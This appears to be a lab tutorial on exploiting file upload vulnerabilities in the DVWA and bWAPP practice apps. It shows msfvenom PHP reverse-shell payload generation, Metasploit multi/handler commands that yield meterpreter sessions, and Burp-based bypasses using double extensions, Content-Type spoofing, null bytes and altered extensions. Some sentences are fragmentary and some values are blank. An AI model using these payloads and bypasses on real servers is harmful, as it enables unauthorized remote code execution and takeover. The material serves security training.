File upload vulnerability is a major problem
with web based applications. In many web servers this vulnerability depends
entirely on purpose, that allows an attacker to upload a file with malicious
code in it that can be executed on the server. An attacker might be able to put
a phishing page into the website or deface the website.
Attacker may reveal internal information of
web server to other and in some chances to sensitive data might
be informal, by unauthorized people.
In this tutorial we are going to disscuss various types
of file upload vulnerbility and then try to exploit them. You will learn the
different injection techniques to upload a malicious file of php in a web
server and exploit them.
Basic file upload Technique
this scenario a simple php file will get uploaded on the web server without any
restrictions, here server does not check the content- type or file extensions
to be uploaded.
example if server allows to upload a text file or image, which is considered as
data and if security parameter is low where as no restrictions on the content-type or filename then you can
easily bypass malicious php file which is considered as application in the web
Let’s start!!!
Click on DVWA Security and set
Website Security Level low
Open terminal in kali linux and create php backdoor through following command
msfvenom -p php/meterpreter/reverse_tcp
lhost= lport=4444 -f raw
Copy and paste the
highlighted code in leafpad and save as with PHP extension as img.php on
the desktop.
Load metasploit framework type msfconsole and start multi handler.
Come back to your DVWA lab and click to file upload option from vulnerability menu.
Now click on browse
tag to
browse img.php file
to upload it on web server and click on upload which
will upload your file on web server.
uploading the PHP file it will show the path of directory where your file is
successfully uploaded now copy the
selected part and paste it in URL to
execute it.
msf > use multi/handler
msf exploit(handler)
> set payload php/meterpreter/reverse_tcp
msf exploit(handler)
> set lhost
msf exploit(handler)
> set lport 4444
msf exploit(handler)
> exploit
meterpreter > sysinfo
You can observe, I have got meterpreter session 1 of victim PC on the metasploit.
Double extension injection Technique
Click on DVWA Security and set
Website Security Level medium
Here we
come across a situation where it would check the file extension. In medium
security it only allows .jpeg and .png extension file to be uploaded on the web
server and restricts other files with single file extension while uploading in
the web server. Now there are some techniques through which we will bypass the
malicious PHP file in the web server.
is an attempt to hide the real nature of a file by inserting multiple extensions
with filename which creates confusion for security parameters. For example img1.php.png
look like png image which is a data not an application but when the file is
uploaded with double extension it will execute php file which is an
Repeat same
process to create the php backdoor
with msfvenom and now save the file as img1.php.png on
desktop and run the multi handler at
the background.
Since this
file will get upload in medium security which is little different from low
security as this will apparently check the extension of file as well as read the
file name.
Click to file upload option from vulnerability menu. Again click on browse button to browse img1.php.png
file to upload it. Now start burp suite
and make intercept on under proxy tab.
Don’t forget to set manual proxy of your browser and click on upload.
tab will work to catch the sent request of the post method when you click to
upload button. Now change img1.php.png into img1.php
inside the fetched data.
the change before uploading your PHP file. After altering click on forward to
upload PHP file in directory.
uploading the PHP file it will show the path of directory where your file is
successfully uploaded now copy the
selected part and paste it in URL to
execute it.
This’ll provide a meterpreter session 2 when
you run URL in browser.
meterpreter > sysinfo
Content – Type file Upload
"Content-Type" entity in the header
of the request indicates the internal media type of the message content.
Sometimes web applications use this parameter in order to recognize a file as a
valid one. For instance, they only accept the files with the "Content-Type"
of "text/plain". It is
possible to bypass this protection by changing this parameter in the request
header using a web proxy.
burp suite and repeat the process for fetching the sent request. In the
screenshot you can read the content- type for php file; now change this content
type application/x-php into image/png to upload your php file.
below image you can perceive the manipulation in content type which known as
content-type injection technique.
Now copy the selected
part and past it in URL to execute
This’ll provide a meterpreter session 3 when
you run URL in browser.
meterpreter > sysinfo
Null byte Injection
Byte Injection is an exploitation technique which uses URL-encoded null byte
characters (i.e. , or 0x00 in hex) to the user-supplied data. A null byte in the URL is represented by
'' which in ASCII is a "" (blank space).This injection process can
alter the intended logic of the application and allow malicious adversary to
get unauthorized access to the system files.
Now here
you will see I have inserted a string at the end of extension and change that
string into its hex value and then replace that hex value from
null byte character ‘’. The
reason behind inserting a null byte value is that, some application servers
scripting language still use c/c++ libraries to check the filename and content.
In c/c++ a line ends with /00 is called
null byte.
Hence when
the compiler studies a null byte at the end of the string, it will assume that
it has arrived at the end of string and stop further reading of string.
Now create the php backdoor with msfvenom and now save the file as img3.php.jpg on
desktop and run the multi handler at
the background.
burp suite and repeat the process for fetching the sent request. It look same
like double extension file but here the technique is quite different from
double extension file uploading.
any string or alphabet as shown in the screenshot here and you will notice that
in the highlighted text I have made change in img3.php.jpg into img3.phpD.jpg,
now follow the next step will be to modify this string into null byte.
next step we will decode the inserted string; now decode your string or
alphabet as I had given ‘D’ now
decodes it into hex which will tell its hex value and from screenshot you can
read its hex value is 44.
Now click on hex option under intercept which will display the hex value of
intercepted data. Here you can read the hex value for the file name which I
have highlighted. In order to null exploitation replace the hex value 44
from null byte value 00.
you can perceive the changes from the given screenshot where I have injected
the null value in the place of hex value of our inserted string.
again you will view the raw data, now here you will find that the string ’D’ is
changed into null byte value.
forward the intercepted data to exploit file upload through null byte injection
technique. Great!!! We have bypass
the medium security now copy the
uploaded path and past it in URL to execute it.
you will run the path it will give you reverse connection on metasploit and
from the given screenshot you can see I have got meterpreter session 4 also.
File Extensions
Next target is bwapp which is another web server Set
security level medium,
from list box choose your bug and select Unrestricted File Upload now and click
on hack
sever side scripting language check .php extension at filename and allow only
those file which does not contain .php extension. Here we can inject our file
by changing a number of letters to their capital
forms to bypass the case sensitive rule, for example PHp or PHP3.
Now create the php backdoor with msfvenom and now save the file as img4.php3 on
desktop and run the multi handler at
the background.
browse img4.php3 to upload in web
server and click on upload tab. Here in medium security it
will allow the php file to get upload on web server and from given screenshot
you can see my php file is successfully uploaded. Now click on the link here
and you will get reverse connection at multi handler.
msf > use multi/handler
msf exploit(handler)
> set payload php/meterpreter/reverse_tcp
msf exploit(handler)
> set lhost
msf exploit(handler)
> set lport 4444
msf exploit(handler)
> exploit
meterpreter > sysinfo
Great!!! You can see I have got meterpreter session 1.